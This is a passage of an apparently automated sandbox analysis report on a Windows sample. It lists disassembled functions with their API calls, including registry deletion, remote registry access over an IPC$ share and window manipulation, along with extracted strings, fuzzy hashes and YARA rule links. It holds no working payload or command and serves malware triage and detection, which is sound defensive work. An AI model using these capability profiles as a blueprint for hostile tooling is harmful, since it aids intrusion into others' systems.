                                                                    • _free.LIBCMT ref: 0091DB5E
                                                                    • _free.LIBCMT ref: 0091DB65
                                                                    • _free.LIBCMT ref: 0091DB82
                                                                    • _free.LIBCMT ref: 0091DB9A
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                    • String ID:
                                                                    • API String ID: 161543041-0
                                                                    • Opcode ID: 4915e38842f4ccd9ead14123139cd936ef954cef22be7a9a5cda37a2438848dd
                                                                    • Instruction ID: 94428ffdfa8a039cd704d524d4a025e8651597409198319eb0af3758bcb051f5
                                                                    • Opcode Fuzzy Hash: 4915e38842f4ccd9ead14123139cd936ef954cef22be7a9a5cda37a2438848dd
                                                                    • Instruction Fuzzy Hash: 7B3148327496089FEB22AB39E945B9A77ECFF40320F114419E459DB191DB34ACE08720
                                                                    Function 0094365B Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 267windowtimeCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetClassNameW.USER32(?,?,00000100), ref: 0094369C
                                                                    • _wcslen.LIBCMT ref: 009436A7
                                                                    • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00943797
                                                                    • GetClassNameW.USER32(?,?,00000400), ref: 0094380C
                                                                    • GetDlgCtrlID.USER32(?), ref: 0094385D
                                                                    • GetWindowRect.USER32(?,?), ref: 00943882
                                                                    • GetParent.USER32(?), ref: 009438A0
                                                                    • ScreenToClient.USER32(00000000), ref: 009438A7
                                                                    • GetClassNameW.USER32(?,?,00000100), ref: 00943921
                                                                    • GetWindowTextW.USER32(?,?,00000400), ref: 0094395D
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout_wcslen
                                                                    • String ID: %s%u
                                                                    • API String ID: 4010501982-679674701
                                                                    • Opcode ID: dc9a4c7e785257c98d1cb01251b2de08b297f309d7a6946324968f86451bde17
                                                                    • Instruction ID: 986f6c1a87775f72c34eab17d503b611bab44fb9a30ac773821e170bd0345620
                                                                    • Opcode Fuzzy Hash: dc9a4c7e785257c98d1cb01251b2de08b297f309d7a6946324968f86451bde17
                                                                    • Instruction Fuzzy Hash: 2B919E71204606EFD719DF34C885FAAF7A8FF44354F108629FAA9D2190DB30EA55CB91
                                                                    Function 00944954 Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 253COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetClassNameW.USER32(?,?,00000400), ref: 00944994
                                                                    • GetWindowTextW.USER32(?,?,00000400), ref: 009449DA
                                                                    • _wcslen.LIBCMT ref: 009449EB
                                                                    • CharUpperBuffW.USER32(?,00000000), ref: 009449F7
                                                                    • _wcsstr.LIBVCRUNTIME ref: 00944A2C
                                                                    • GetClassNameW.USER32(00000018,?,00000400), ref: 00944A64
                                                                    • GetWindowTextW.USER32(?,?,00000400), ref: 00944A9D
                                                                    • GetClassNameW.USER32(00000018,?,00000400), ref: 00944AE6
                                                                    • GetClassNameW.USER32(?,?,00000400), ref: 00944B20
                                                                    • GetWindowRect.USER32(?,?), ref: 00944B8B
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen_wcsstr
                                                                    • String ID: ThumbnailClass
                                                                    • API String ID: 1311036022-1241985126
                                                                    • Opcode ID: 522a1c9aeb8f3bbc48ac9673aae266db85e360579302919f8cb78fdac858930f
                                                                    • Instruction ID: c64f8a5aeb20ee0950c40880989e5e6efd00fe04620a617f1dc2679ef3bf7274
                                                                    • Opcode Fuzzy Hash: 522a1c9aeb8f3bbc48ac9673aae266db85e360579302919f8cb78fdac858930f
                                                                    • Instruction Fuzzy Hash: CB91C0721082069FDB04DF14C985FAA77ECFF84718F048469FD899A196EB34ED45CBA1
                                                                    Function 0096CC34 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 104registryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 0096CC64
                                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?,00000000), ref: 0096CC8D
                                                                    • FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 0096CD48
                                                                      • Part of subcall function 0096CC34: RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 0096CCAA
                                                                      • Part of subcall function 0096CC34: LoadLibraryA.KERNEL32(advapi32.dll,?,?,00000000), ref: 0096CCBD
                                                                      • Part of subcall function 0096CC34: GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 0096CCCF
                                                                      • Part of subcall function 0096CC34: FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 0096CD05
                                                                      • Part of subcall function 0096CC34: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 0096CD28
                                                                    • RegDeleteKeyW.ADVAPI32(?,?), ref: 0096CCF3
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: Library$EnumFree$AddressCloseDeleteLoadOpenProc
                                                                    • String ID: RegDeleteKeyExW$advapi32.dll
                                                                    • API String ID: 2734957052-4033151799
                                                                    • Opcode ID: 4c64c040c2f6c7be447a2d41e40566cc756e73ae7573645d9a75d38689e86e2e
                                                                    • Instruction ID: b6c26cd151d34971a451b29fcd88e802ee4a6a9d4e54d9f148802766501ba91c
                                                                    • Opcode Fuzzy Hash: 4c64c040c2f6c7be447a2d41e40566cc756e73ae7573645d9a75d38689e86e2e
                                                                    • Instruction Fuzzy Hash: 153160F2905129BBDB209B54DC88EFFBB7CEF46750F000569B949E2240D7349A85EAE0
                                                                    Function 00953D1E Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 101fileCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00953D40
                                                                    • _wcslen.LIBCMT ref: 00953D6D
                                                                    • CreateDirectoryW.KERNEL32(?,00000000), ref: 00953D9D
                                                                    • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00953DBE
                                                                    • RemoveDirectoryW.KERNEL32(?), ref: 00953DCE
                                                                    • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00953E55
                                                                    • CloseHandle.KERNEL32(00000000), ref: 00953E60
                                                                    • CloseHandle.KERNEL32(00000000), ref: 00953E6B
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove_wcslen
                                                                    • String ID: :$\$\??\%s
                                                                    • API String ID: 1149970189-3457252023
                                                                    • Opcode ID: 098b22f55e17ede506b6a0d7e29ad7074642492b5e6fb84e21ed746c080c5513
                                                                    • Instruction ID: 5aed6c5efbbecf344659a74dec9bd93c00bce16c80197a191810a7901309da71
                                                                    • Opcode Fuzzy Hash: 098b22f55e17ede506b6a0d7e29ad7074642492b5e6fb84e21ed746c080c5513
                                                                    • Instruction Fuzzy Hash: 2A31B6B2514109ABDB21DBA1DC49FEF37BCEF88741F1040B9FA19D6091E77497888B24
                                                                    Function 0094E6B0 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • timeGetTime.WINMM ref: 0094E6B4
                                                                      • Part of subcall function 008FE551: timeGetTime.WINMM(?,?,0094E6D4), ref: 008FE555
                                                                    • Sleep.KERNEL32(0000000A), ref: 0094E6E1
                                                                    • EnumThreadWindows.USER32(?,Function_0006E665,00000000), ref: 0094E705
                                                                    • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 0094E727
                                                                    • SetActiveWindow.USER32 ref: 0094E746
                                                                    • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 0094E754
                                                                    • SendMessageW.USER32(00000010,00000000,00000000), ref: 0094E773
                                                                    • Sleep.KERNEL32(000000FA), ref: 0094E77E
                                                                    • IsWindow.USER32 ref: 0094E78A
                                                                    • EndDialog.USER32(00000000), ref: 0094E79B
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                                    • String ID: BUTTON
                                                                    • API String ID: 1194449130-3405671355
                                                                    • Opcode ID: 7e9b9c98d4cbb91d5a4859cddb77fde67ab91574368e33127df6bcf35dfb3c3f
                                                                    • Instruction ID: c0b8ffdd1d808f272a08698bfda3a06d792c96c8ff6b2b8cbba9175bf6f578d0
                                                                    • Opcode Fuzzy Hash: 7e9b9c98d4cbb91d5a4859cddb77fde67ab91574368e33127df6bcf35dfb3c3f
                                                                    • Instruction Fuzzy Hash: 322181B1628205EFEB005F30EDCAE293B6DF7543A9F101629F50AC11A1DB71AC40AB24
                                                                    Function 0094E9FC Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 71COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 008E9CB3: _wcslen.LIBCMT ref: 008E9CBD
                                                                    • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 0094EA5D
                                                                    • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0094EA73
                                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0094EA84
                                                                    • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 0094EA96
                                                                    • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0094EAA7
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: SendString$_wcslen
                                                                    • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                    • API String ID: 2420728520-1007645807
                                                                    • Opcode ID: 266d67be899b88c7a591ac6344d118f996b56e334faf8844947662e594016c27
                                                                    • Instruction ID: e76476e3c7695be19f75f0553d4933ac11448698a52cc9ae1564c16b8ddc9e41
                                                                    • Opcode Fuzzy Hash: 266d67be899b88c7a591ac6344d118f996b56e334faf8844947662e594016c27
                                                                    • Instruction Fuzzy Hash: B0117C31A9026979D720E7AADC4AEFF6A7CFBD3B04F440529B811E20D1EEB04E45C5B1
                                                                    Function 00945CC6 Relevance: 18.2, APIs: 12, Instructions: 173COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetDlgItem.USER32(?,00000001), ref: 00945CE2
                                                                    • GetWindowRect.USER32(00000000,?), ref: 00945CFB
                                                                    • MoveWindow.USER32(?,0000000A,00000004,?,?,00000004,00000000), ref: 00945D59
                                                                    • GetDlgItem.USER32(?,00000002), ref: 00945D69
                                                                    • GetWindowRect.USER32(00000000,?), ref: 00945D7B
                                                                    • MoveWindow.USER32(?,?,00000004,00000000,?,00000004,00000000), ref: 00945DCF
                                                                    • GetDlgItem.USER32(?,000003E9), ref: 00945DDD
                                                                    • GetWindowRect.USER32(00000000,?), ref: 00945DEF
                                                                    • MoveWindow.USER32(?,0000000A,00000000,?,00000004,00000000), ref: 00945E31
                                                                    • GetDlgItem.USER32(?,000003EA), ref: 00945E44
                                                                    • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00945E5A
                                                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 00945E67
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: Window$ItemMoveRect$Invalidate
                                                                    • String ID:
                                                                    • API String ID: 3096461208-0
                                                                    • Opcode ID: 75bfd57fa839b2f69140c08764ec5d5486116252dd3ded27de944d5fc3348555
                                                                    • Instruction ID: 084a5013aeef9a215409fb25306542df28fb02561ff8d0ba038f72718744f5a4
                                                                    • Opcode Fuzzy Hash: 75bfd57fa839b2f69140c08764ec5d5486116252dd3ded27de944d5fc3348555
                                                                    • Instruction Fuzzy Hash: 47511CB1B10605AFDF18CFA8CD89EAEBBB9EF48300F158129F519E6291D7709E40CB50
                                                                    Function 008F8BCD Relevance: 18.2, APIs: 12, Instructions: 168timeCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 008F8F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,008F8BE8,?,00000000,?,?,?,?,008F8BBA,00000000,?), ref: 008F8FC5
                                                                    • DestroyWindow.USER32(?), ref: 008F8C81
                                                                    • KillTimer.USER32(00000000,?,?,?,?,008F8BBA,00000000,?), ref: 008F8D1B
                                                                    • DestroyAcceleratorTable.USER32(00000000), ref: 00936973
                                                                    • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,00000000,?,?,?,?,008F8BBA,00000000,?), ref: 009369A1
                                                                    • ImageList_Destroy.COMCTL32(?,?,?,?,?,?,?,00000000,?,?,?,?,008F8BBA,00000000,?), ref: 009369B8
                                                                    • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,?,?,00000000,?,?,?,?,008F8BBA,00000000), ref: 009369D4
                                                                    • DeleteObject.GDI32(00000000), ref: 009369E6
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                                    • String ID:
                                                                    • API String ID: 641708696-0
                                                                    • Opcode ID: e27906e6c93971089fba99e398e331b3b30203b4dcd244874499ecd760abb73a
                                                                    • Instruction ID: 5d03fcb7329f4eb67286c8164605462304129fbb53de85977e7c491df9ea1612
                                                                    • Opcode Fuzzy Hash: e27906e6c93971089fba99e398e331b3b30203b4dcd244874499ecd760abb73a
                                                                    • Instruction Fuzzy Hash: 0B619931116608EFDB259F28DA58B3977F1FB40326F54861CE286DB960CB31A990EF90
                                                                    Function 008F9838 Relevance: 18.1, APIs: 12, Instructions: 137COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 008F9944: GetWindowLongW.USER32(?,000000EB), ref: 008F9952
                                                                    • GetSysColor.USER32(0000000F), ref: 008F9862
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: ColorLongWindow
                                                                    • String ID:
                                                                    • API String ID: 259745315-0
                                                                    • Opcode ID: 6e2dee6afde7818651c8bb1594d138afdc202bdd58c66af49f5c85f2a2c964b9
                                                                    • Instruction ID: 5a739a74acb6ce7ac054bcbb7a0b1e57ca495185fd0d1f3186441805e81d3fe5
                                                                    • Opcode Fuzzy Hash: 6e2dee6afde7818651c8bb1594d138afdc202bdd58c66af49f5c85f2a2c964b9
                                                                    • Instruction Fuzzy Hash: A041AF71118648AFDB305F389C88BB93BA9FB46370F144629FAE6C71E1C7319981EB11
                                                                    Function 009496E2 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 137windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,?,?,0092F7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?), ref: 00949717
                                                                    • LoadStringW.USER32(00000000,?,0092F7F8,00000001), ref: 00949720
                                                                      • Part of subcall function 008E9CB3: _wcslen.LIBCMT ref: 008E9CBD
                                                                    • GetModuleHandleW.KERNEL32(00000000,00000001,?,00000FFF,?,?,0092F7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?,00000000), ref: 00949742
                                                                    • LoadStringW.USER32(00000000,?,0092F7F8,00000001), ref: 00949745
                                                                    • MessageBoxW.USER32(00000000,00000000,?,00011010), ref: 00949866
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: HandleLoadModuleString$Message_wcslen
                                                                    • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                    • API String ID: 747408836-2268648507
                                                                    • Opcode ID: de3a3f3cd1d0053f57b54f6daf08739b064fe5eff86ea560b14a388bb50decd7
                                                                    • Instruction ID: 2f5f8a983d3946653d54a12117176e0c91f35d94d238ee65680bc975db973458
                                                                    • Opcode Fuzzy Hash: de3a3f3cd1d0053f57b54f6daf08739b064fe5eff86ea560b14a388bb50decd7
                                                                    • Instruction Fuzzy Hash: 3B417D72804259AACB04FBE5DD86EEF7778FF56340F600025F605B2192EA646F48CB62
                                                                    Function 009406DE Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 127registryshareCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 008E6B57: _wcslen.LIBCMT ref: 008E6B6A
                                                                    • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 009407A2
                                                                    • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 009407BE
                                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 009407DA
                                                                    • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00940804
                                                                    • CLSIDFromString.OLE32(?,000001FE,?,SOFTWARE\Classes\), ref: 0094082C
                                                                    • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00940837
                                                                    • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0094083C
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_wcslen
                                                                    • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                    • API String ID: 323675364-22481851
                                                                    • Opcode ID: cd8c0fa7db2205dbc29c67d6e5b6753e751840939d5cf209a25346ced8b1d033
                                                                    • Instruction ID: 000a703c839b1a4a1b875f7d3829f3bf3f3eaed958cac41fe35b850e6875b7d7
                                                                    • Opcode Fuzzy Hash: cd8c0fa7db2205dbc29c67d6e5b6753e751840939d5cf209a25346ced8b1d033
                                                                    • Instruction Fuzzy Hash: 12414B72C10228ABCF15EFA4DC85CEEB778FF85750F554129E915A3161EB30AE44CBA1
                                                                    Function 00963C30 Relevance: 16.8, APIs: 11, Instructions: 344fileCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • VariantInit.OLEAUT32(?), ref: 00963C5C
                                                                    • CoInitialize.OLE32(00000000), ref: 00963C8A
                                                                    • CoUninitialize.OLE32 ref: 00963C94
                                                                    • _wcslen.LIBCMT ref: 00963D2D
                                                                    • GetRunningObjectTable.OLE32(00000000,?), ref: 00963DB1
                                                                    • SetErrorMode.KERNEL32(00000001,00000029), ref: 00963ED5
                                                                    • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,?), ref: 00963F0E
                                                                    • CoGetObject.OLE32(?,00000000,0097FB98,?), ref: 00963F2D
                                                                    • SetErrorMode.KERNEL32(00000000), ref: 00963F40
                                                                    • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00963FC4
                                                                    • VariantClear.OLEAUT32(?), ref: 00963FD8
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
